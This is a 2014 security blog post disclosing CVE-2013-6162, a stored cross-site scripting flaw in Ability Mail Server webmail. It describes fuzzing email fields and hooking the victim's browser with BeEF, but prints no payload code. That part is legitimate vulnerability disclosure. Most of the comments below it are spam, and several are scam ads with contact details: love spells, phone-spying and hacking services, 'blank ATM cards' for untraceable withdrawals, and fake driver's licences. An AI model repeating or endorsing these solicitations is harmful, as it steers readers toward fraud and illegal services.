Wednesday, January 22, 2014

Kriss Kross Site Scripting in Ability Mail Server - CVE-2013-6162

Cross Site Scripting

Cross Site Scripting (XSS) is a type of attack where an attacker can have a legitimate website or web application send a payload, usually JavaScript, to their user's browsers. The user's browser will then receive this payload and execute whatever it may be. Essentially, the attacker is taking advantage of the fact that the browser is going to trust that whatever the web application is sending is trustworthy and will execute it with no questions asked. Cross Site Request Forgery (CSRF) is the opposite of this where the web application will trust that whatever actions the user's web browser is requesting to perform are trustworthy and will execute them with no questions asked. We'll get to CSRF in a later post. You can read more about XSS and its various flavors here.

Anyways, XSS is often disregarded as low impact because the quintessential XSS proof of concept is usually throwing up an alert box. Big whoop. Well, not so fast...It is number three on OWASP's Top 10 (CSRF is number 8) so there's gotta be more to it. Let's dig in.

CVE-2013-6162 

CVE-2013-6162 is a XSS vulnerability I discovered in Ability Mail Server 3.1.1. It's a fairly simple XSS vulnerability to demonstrate, but I think it serves as a good example of what kind of impact XSS can have. After installing Ability Mail Server (AMS) and installing the webmail component of AMS, we created a victim account to do our testing on.

First things first, we will fuzz the various fields of an email. This can range from injecting JavaScript in the From, To, Subject, Date, etc. fields and seeing if you can trigger an alert box. Eventually we try injecting into the body of the email 

Once we run that script we log in with the victim account and view the email.

Success! We've been able to get the browser to execute JavaScript of our choosing.

Now, the normal XSS attack involves dumping the user's cookie and attempting to login as the user via a replay attack. Unfortunately, I didn't get a cookie when I attempted this. So, what else could we do? I never attempted using BeEF via XSS, only through the demo site so I decided to check it out. BeEF is a tool that you can use to execute commands against a victim's browser. The main stipulation is that the user must load the hook.js script which allows all of the magic. BeEF is a really great tool and you can read more about it here. I updated my proof of concept to load the hook.js script, fired up BeEF in Kali, and fired away.

Upon opening the email...

Sweet!

I have not had the opportunity to load BeEF via XSS before so this was a new wrinkle.

While this CVE deals with XSS and violating the trust that a browser has in a website, I was able to leverage this vulnerability into a CSRF attack. I'll detail that in another post.


13 comments:

  1. Is this some kind of a cyber virus for windows?. How can we all protect our systems from this dangerous virus if it is one?.

    ReplyDelete
    Replies
    1. DR. JOROMI IS TRULY A POWERFUL MAN. Contacting Dr Joromi is the best thing that has ever happened to me. My husband left me for another woman for the reason which i know nothing about. I tried every means to get him back but to no avail, all my efforts proved abortive. I was even contemplating suicide. On a lucky day when i was browsing the internet, i came across some amazing testimonies about Dr. Joromi on how he has helped a lot of people with his powerful love spells. I contacted him and explained all my problems to him and he assured me that he will help me. He told me what to do and assured me that my man will be back in 12 hours. I obeyed him and followed the instructions and to my Greatest surprise, my man called me in 12 hours time just as Dr. Joromi said. Thank you Dr Joromi. May the good God continue to bless you. If you are in need of help please contact Dr Joromi now on his website: https://www.joromispells.com and you can also reach him with his email: Joromispells@gmail.com and here is his WhatsApp number which you can also use to reach him +2348138695387 Thank you Dr Joromi. Thank you once again

      Delete
  2. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging. If anyone wants to become a Front end developer learn from Javascript Training in Chennai . or learn thru Javascript Training in Chennai. Nowadays JavaScript has tons of job opportunities on various vertical industry. JavaScript Training in Chennai

    ReplyDelete
  3. Its a wonderful post. You have shared detailed description of the substance which is quite helpful for the students. Anyways, the students looking for their https://australianreviewer.com/big-assignments-review/ homework help can get in touch with paper writing service.

    ReplyDelete
  4. I have been looking for this information for the whole day. I didn't even think that I will find it. Fortunately, I did it.

    ReplyDelete
  5. I really enjoy reading of your article. I wanted to inform you that you have people like me who appreciate your work. no wifi games

    ReplyDelete
  6. Confront your cheating spouse with evidence, i was able to spy on my cheating ex phone without finding out.....it really helped me during my divorce ...you can contact BESTAPPSHACKERS@GMAIL.COM) call and text him whatsapp +1(602) 609-4730 for spying and hacking social networks, school servers, icloud and much more, viber chats hack, Facebook messages and yahoo messenger, calls log and spy call recording, monitoring SMS text messages remotely, cell phone GPS location tracking, spy on Whats app Messages, his services are AFFORDABLE .............179800

    ReplyDelete
  7. I am Leah Hart I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from united hacking company  blank ATM card that can withdraw $5,500 daily. I got it from him  last week and now I have withdrawn about $15,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met united hacking company  because I met Five persons before him and they could not help me. But am happy now united hacking company  sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to the united hacking company   because he changed my story all of a sudden. The card works in all countries that is the good news contact. email address: unitedblankatmhackcard@gmail.com 

    ReplyDelete
  8. Never met any hacker as discreet and fast like this Best System Hackers. They are called WhiteHats and they has helped me in multiple ways first was when my ex spouse cheated on me- they got me every information from my spouse phone number and now they are helping me paying my credit cards debts. They have the best hacking tools plus service any one can ever imagine and I recommend him to the world. I am thankful and grateful for the second chance. Honestly, Best System hackers are life savers please contact them here if you need their swift service Email; jeansonjamesancheta7@gmail.com or text him on WhatsApp +1 (559) 851-5537 he is very trustworthy.

    ReplyDelete
  9. Wow this is awesome, very interesting article. I can imagine the energy and inspiration you have invested on this powerful combination of words. Many articles I come across these days do not really dive this deep to make it clear to their audience as you did. But believe me the way you interact is literally 100% perfect. I will instantly grab your rss feed to stay informed of any updates you make on your blog and as well take the advantage to demonstrate
    5 WAYS TO SPOT A FAKE DRIVERS LICENSE WITH NO DMV RECORD which many people are ignorant of when ordering fake documents online. Not over demanding I will also take the advantage to ask for your permission to join our 179.3k members TELEGRAM GROUP
    to share with us your ideas or any latest update on your blog.
    Thanks I am Scott from Globex, we are expecting you on our platform

    ReplyDelete